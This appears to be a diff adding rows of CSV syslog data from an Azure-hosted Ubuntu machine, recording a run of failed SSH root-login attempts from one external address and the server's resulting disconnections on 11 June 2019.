+8231,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:59:04,UbuntuDevEnv,2019-06-11 18:59:03,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,38833,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8232,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:59:04,UbuntuDevEnv,2019-06-11 18:59:03,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,38833,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8233,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:59:07,UbuntuDevEnv,2019-06-11 18:59:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,38898,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8234,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:59:09,UbuntuDevEnv,2019-06-11 18:59:09,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 24155 ssh2,38898,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,24155,,
+8235,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:59:12,UbuntuDevEnv,2019-06-11 18:59:11,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 24155 ssh2,38898,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,24155,,
+8236,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:59:23,UbuntuDevEnv,2019-06-11 18:59:22,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 61.177.172.128 port 24155 ssh2],38898,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,24155,,
+8237,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:59:23,UbuntuDevEnv,2019-06-11 18:59:22,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 24155 ssh2 [preauth],38898,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,24155,,
+8238,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:59:23,UbuntuDevEnv,2019-06-11 18:59:22,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,38898,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8239,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:59:23,UbuntuDevEnv,2019-06-11 18:59:22,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,38898,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8240,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:59:23,UbuntuDevEnv,2019-06-11 18:59:22,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 24155: Too many authentication failures [preauth],38898,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,24155,,
+8241,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:59:26,UbuntuDevEnv,2019-06-11 18:59:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,38978,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8242,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:59:28,UbuntuDevEnv,2019-06-11 18:59:27,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 31264 ssh2,38978,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,31264,,
+8243,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:59:41,UbuntuDevEnv,2019-06-11 18:59:41,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,38978,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8244,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:59:41,UbuntuDevEnv,2019-06-11 18:59:41,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 31264: Too many authentication failures [preauth],38978,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,31264,,
+8245,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:59:41,UbuntuDevEnv,2019-06-11 18:59:41,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 61.177.172.128 port 31264 ssh2],38978,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,31264,,
+8246,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:59:41,UbuntuDevEnv,2019-06-11 18:59:41,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 31264 ssh2 [preauth],38978,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,31264,,
+8247,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:59:41,UbuntuDevEnv,2019-06-11 18:59:41,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,38978,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8248,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:59:45,UbuntuDevEnv,2019-06-11 18:59:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,39040,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8249,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:59:47,UbuntuDevEnv,2019-06-11 18:59:46,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 38291 ssh2,39040,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,38291,,
+8250,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:00:00,UbuntuDevEnv,2019-06-11 19:00:00,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 38291: Too many authentication failures [preauth],39040,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,38291,,
+8251,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:00:00,UbuntuDevEnv,2019-06-11 19:00:00,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 38291 ssh2 [preauth],39040,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,38291,,
+8252,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:00:00,UbuntuDevEnv,2019-06-11 19:00:00,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 61.177.172.128 port 38291 ssh2],39040,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,38291,,
+8253,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:00:00,UbuntuDevEnv,2019-06-11 19:00:00,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,39040,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8254,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:00:00,UbuntuDevEnv,2019-06-11 19:00:00,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,39040,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8255,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:00:04,UbuntuDevEnv,2019-06-11 19:00:03,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,39135,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8256,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:00:05,UbuntuDevEnv,2019-06-11 19:00:05,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 45350 ssh2,39135,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,45350,,
+8257,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:00:10,UbuntuDevEnv,2019-06-11 19:00:07,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 45350 ssh2,39135,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,45350,,
+8258,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:00:10,UbuntuDevEnv,2019-06-11 19:00:10,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 45350 ssh2,39135,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,45350,,
+8259,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:00:19,UbuntuDevEnv,2019-06-11 19:00:19,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 61.177.172.128 port 45350 ssh2],39135,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,45350,,
+8260,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:00:19,UbuntuDevEnv,2019-06-11 19:00:19,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,39135,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8261,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:00:19,UbuntuDevEnv,2019-06-11 19:00:19,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,39135,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8262,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:00:19,UbuntuDevEnv,2019-06-11 19:00:19,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 45350: Too many authentication failures [preauth],39135,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,45350,,
+8263,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:00:19,UbuntuDevEnv,2019-06-11 19:00:19,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 45350 ssh2 [preauth],39135,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,45350,,
+8264,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:00:23,UbuntuDevEnv,2019-06-11 19:00:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,39213,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8265,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:00:25,UbuntuDevEnv,2019-06-11 19:00:25,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 52529 ssh2,39213,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,52529,,
+8266,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:00:38,UbuntuDevEnv,2019-06-11 19:00:37,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 61.177.172.128 port 52529 ssh2],39213,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,52529,,
+8267,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:00:40,UbuntuDevEnv,2019-06-11 19:00:40,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 52529 ssh2,39213,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,52529,,
+8268,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:00:40,UbuntuDevEnv,2019-06-11 19:00:40,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 52529: Too many authentication failures [preauth],39213,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,52529,,
+8269,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:00:40,UbuntuDevEnv,2019-06-11 19:00:40,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,39213,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8270,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:00:40,UbuntuDevEnv,2019-06-11 19:00:40,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,39213,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8271,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:00:40,UbuntuDevEnv,2019-06-11 19:00:40,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 52529 ssh2 [preauth],39213,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,52529,,
+8272,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:00:44,UbuntuDevEnv,2019-06-11 19:00:43,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,39343,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8273,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:00:45,UbuntuDevEnv,2019-06-11 19:00:44,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 60522 ssh2,39343,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,60522,,
+8274,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:00:59,UbuntuDevEnv,2019-06-11 19:00:59,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 61.177.172.128 port 60522 ssh2],39343,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,60522,,
+8275,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:00:59,UbuntuDevEnv,2019-06-11 19:00:59,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,39343,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8276,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:00:59,UbuntuDevEnv,2019-06-11 19:00:59,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 60522 ssh2 [preauth],39343,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,60522,,
+8277,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:00:59,UbuntuDevEnv,2019-06-11 19:00:59,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,39343,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8278,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:00:59,UbuntuDevEnv,2019-06-11 19:00:59,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 60522: Too many authentication failures [preauth],39343,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,60522,,
+8279,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:01:03,UbuntuDevEnv,2019-06-11 19:01:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,39406,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8280,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:01:04,UbuntuDevEnv,2019-06-11 19:01:04,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 3495 ssh2,39406,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,3495,,
+8281,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:01:11,UbuntuDevEnv,2019-06-11 19:01:09,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 61.177.172.128 port 3495 ssh2],39406,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,3495,,
+8282,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:01:13,UbuntuDevEnv,2019-06-11 19:01:12,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 3495 ssh2,39406,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,3495,,
+8283,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:01:18,UbuntuDevEnv,2019-06-11 19:01:17,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 3495 ssh2 [preauth],39406,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,3495,,
+8284,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:01:18,UbuntuDevEnv,2019-06-11 19:01:17,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 61.177.172.128 port 3495 ssh2],39406,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,3495,,
+8285,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:01:18,UbuntuDevEnv,2019-06-11 19:01:17,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,39406,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8286,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:01:18,UbuntuDevEnv,2019-06-11 19:01:17,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,39406,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8287,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:01:18,UbuntuDevEnv,2019-06-11 19:01:17,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 3495: Too many authentication failures [preauth],39406,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,3495,,
+8288,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:01:21,UbuntuDevEnv,2019-06-11 19:01:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,39482,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8289,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:01:23,UbuntuDevEnv,2019-06-11 19:01:23,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 10521 ssh2,39482,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,10521,,
